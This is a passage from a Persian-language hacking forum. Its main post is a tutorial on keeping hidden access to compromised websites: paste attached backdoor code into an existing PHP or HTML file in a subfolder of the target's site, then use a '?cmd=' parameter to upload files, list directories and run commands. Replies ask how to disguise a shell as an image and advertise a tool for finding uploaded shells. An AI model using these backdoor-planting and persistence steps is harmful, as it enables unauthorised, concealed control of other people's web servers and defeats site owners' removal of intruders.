    درود یه آموزش مخصوص برای کاربران عزیز گاردایران + سوپرایز شما با انجام این کار ها میتونید در صورتی که شلتون پاک شد به صورت مخفی دوباره شلتون رو اپلود کنید یا هر فایل دلخواهی رو اپلود کنید 1.خب دوستان فایل پیوست شده رو دان کنید. 2.توسط شل یکی از فایل های تارگت رو انتخاب کنید که فرمتش html یا php باشده سعی کنید فایل تو دایرکتوری اصلی نباشه و یعنی داخل: /public_html/ نباشه و حتما داخل : /public_html/test/ باشه. 3.بعد سپس فایل انتخاب شده رو به حالت ادیت (edit) در بیارید و اخر فایل , کدی که درون فایل پیوست شده هست رو کپی و پیست کنید و فایل رو سیو کنید. در این جا به طور مثال فایل انتخاب شده Goodzilam.php نام داره. خب حالا کافیه فایل انتخاب شده رو در مرورگرتون باز کنید: target.com/test/Goodzilam.php و اخر ادرس کد زیر رو اضافه کنید: cmd=up? یعنی به این صورت: target.com/test/Goodzilam.php?cmd=up و بعله میبینید که صفحه ریلود میشه و میتونید فایل های مختلف رو انتخاب و اپلود کنید. حالا یه سورپرایز دیگه شما میتونید مانند مثال بالا بجای up کاماند های cmd رو بزنید یعنی برای مشاهده directory و فولدر ها به این شکل در میاد: target.com/test/Goodzilam.php?cmd=dir برای ساخت فولدر از کاماند mkdir استفاده میکنیم: target.com/test/Goodzilam.php?cmd=mkdir foldername بووووووووم فولدری به نام foldername ساخته میشه up.php
  24. Shiru
    سلام ببخشید میخواستم بدونم چطور میتونم یه شل رو به صورت عکس یاpng ذخیره کنم و بعد دوباره بهفرمت php برگردونم و از اون استفاده کنم یه سرچ هم تو گوگل هم تو انجمن خودمون زدم به جواب درستی نرسیدم لطفا کنک کنید
  25. kali

    شل فایندر Shell Finder

    kali پاسخی ارسال کرد برای یک موضوع در اسکنرها Scanners

    اسکریپت شل فایندر قوی براتون قرار دادم با این ابزار میتونید ادرس سایت مورد نظر بدهید اگه شل ابلود شده باشه از قبل لینکشو به شما میده عکس از محیط برنامه Find Shell.rar
×
×
  • ایجاد مورد جدید...